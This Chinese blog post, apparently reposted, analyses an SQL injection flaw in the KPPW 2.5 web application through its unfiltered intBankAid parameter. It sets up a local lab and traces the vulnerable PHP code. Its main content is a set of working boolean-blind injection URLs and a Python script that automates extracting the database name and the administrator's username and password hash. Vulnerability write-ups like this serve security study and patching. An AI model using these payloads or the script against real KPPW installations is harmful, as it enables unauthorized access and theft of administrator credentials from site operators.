KPPW2.5 漏洞利用--SQL注入

最新推荐文章于 2021-12-10 00:02:02 发布

weixin_30341735

最新推荐文章于 2021-12-10 00:02:02 发布

阅读量415

点赞数

CC 4.0 BY-SA版权

文章标签： php 数据库 python

原文链接：http://www.cnblogs.com/Oran9e/p/8261750.html

本文分析了KPPW2.5版本中存在的SQL注入漏洞，并通过布尔型盲注的方式展示了如何利用该漏洞获取数据库信息及后台管理员账号密码。

KPPW2.5 漏洞利用--SQL注入

SQL注入--布尔型盲注

环境搭建

1，集成环境简单方便，如wamp,phpstudy....

2，KPPW v2.2源码一份（文末有分享）放到WWW目录下面

3，安装，访问（http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/install/index.php），选择下一步，下一步，填写数据库信息，后台管理员账号密码等等。

上述，漏洞复现平台搭建成功。

首页（http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php）。

漏洞分析

/control/user/account_auth.php文件

$arrAllowAuth = array('realname','enterprise','bank','mobile','email');
if ($code&&in_array($code,$arrAllowAuth)) {
    $code or $code = $keys ['0']; 
    $code or kekezu::show_msg ( $_lang ['param_error'], "index.php?do=auth", 3, '', 'warning' );
    $auth_class = "keke_auth_" . $code . "_class";
    $objAuth = new $auth_class ( $code ); 
    $auth_item = $arrAllAuthItems [$code]; 
    $auth_dir = $auth_item ['auth_dir']; 
    $arrAuthInfo = $objAuth->get_user_auth_info ( $gUid, 0, $intBankAid ); 
    require S_ROOT . "/auth/$code/control/index.php";
    require keke_tpl_class::template ( 'auth/' . $code . '/tpl/' . $_K ['template'] . '/'.$step );
    die;
} else {
    $real_pass = keke_auth_fac_class::auth_check ( 'enterprise', $gUid ) or $real_pass = keke_auth_fac_class::auth_check ( "realname", $gUid );
    $arrHasAuthItem = keke_auth_fac_class::get_auth ( $gUserInfo );
    $arrUserAuthInfo = $arrHasAuthItem ['info'];
}

仔细看看这里的：

$arrAuthInfo = $objAuth->get_user_auth_info ( $gUid, 0, $intBankAid );

这里的变量$intBankAid进入了函数get_user_auth_info函数跟进函数get_user_auth_info

/lib/sys/keke_auth_base_class.php：

public function get_user_auth_info($uid,$is_username=0,$show_id=''){
        $sql="select * from ".TABLEPRE.$this->_auth_table_name;
        if($uid){
            $is_username=='0' and $sql.=" where uid = '$uid' " or $sql.=" where username = '$uid' ";
            $show_id and $sql.=" and ".$this->_primary_key."=".$show_id;
            $sql .=" order by $this->_primary_key desc";
            $data = db_factory::query($sql);
            if(sizeof($data)==1){
                return $data[0];
            }else{
                return $data;
            }
        }else{
            return array();
        }

接收到的变量$intBankAid——$show_id，然后$show_id进入$sql 整个过程中变量$intBankAid未过滤，

最后进入$sql进入数据库，导致sql注入漏洞。

漏洞利用

准备：注册个账号登陆上去，绑定银行卡，进入银行认证的环节，也就是存在SQL注入的页面（http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147）。

首先用 and 1=1 和 and 1=2 判断

http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and 1=1

http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and 1=2

接下来就进行布尔盲注。

判断数据库长度：

http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and (select (length(database())))=6--+-

查看数据库名字：

http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and (select ascii(substr(database(),1,1)))=107--+-

查看后台管理员账号：

http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and ascii(substr((select username from keke_witkey_member order by uid limit 0,1),1,1))=97--+

查看后台管理员密码：

http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and ascii(substr((select password from keke_witkey_member order by uid limit 0,1),1,1))=102--+

上面写了个简单的python小脚本

#coding=utf-8
#by orange
import requests
import string
database_length=0
database_name=''
username=''
houtai_name=''
houtai_pass=''
url="http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147"
headers={
    'Cookie':'PHPSESSID=qugpfg8d0bclq4k2mhm57f9426'
}
'''
数据库长度
print("数据库长度")
for i in range(1,10):
    payload=" and (select (length(database())))=%d--+-" % i
    length=requests.get(url+payload,headers=headers)
    print("正在测试......")
    print i
    if "622***018" in length.text:
        print("数据库长度：")
        print i
        database_length=i
        break
'''
'''
print("数据库名字")
for i in range(1,7):
    for j in range(1,123):
        payload = " and (select ascii(substr(database(),%d,1))) = %d--+-"%(i,j)
        database_name1 = requests.get(url+payload,headers=headers)
        if "622***018" in database_name1.text:
            database_name+=chr(j)
            print i
            print database_name
            break
'''
'''
print("后台账号:")
for i in range(1,6):
    for j in range(97,123):
        payload = " and ascii(substr((select username from keke_witkey_member order by uid limit 0,1),%d,1))=%d--+"%(i,j)
        houtai_name1 = requests.get(url+payload,headers=headers)
        if "622***018" in houtai_name1.text:
            houtai_name+=chr(j)
            print i
            print houtai_name
            break
'''    
'''    
print("后台密码:")
for i in range(1,33):
    for j in range(33,123):
        payload = " and ascii(substr((select password from keke_witkey_member order by uid limit 0,1),%d,1))=%d--+"%(i,j)
        houtai_pass1 = requests.get(url+payload,headers=headers)
        if "622***018" in houtai_pass1.text:
            houtai_pass+=chr(j)
            print i
            print houtai_pass
            break    
'''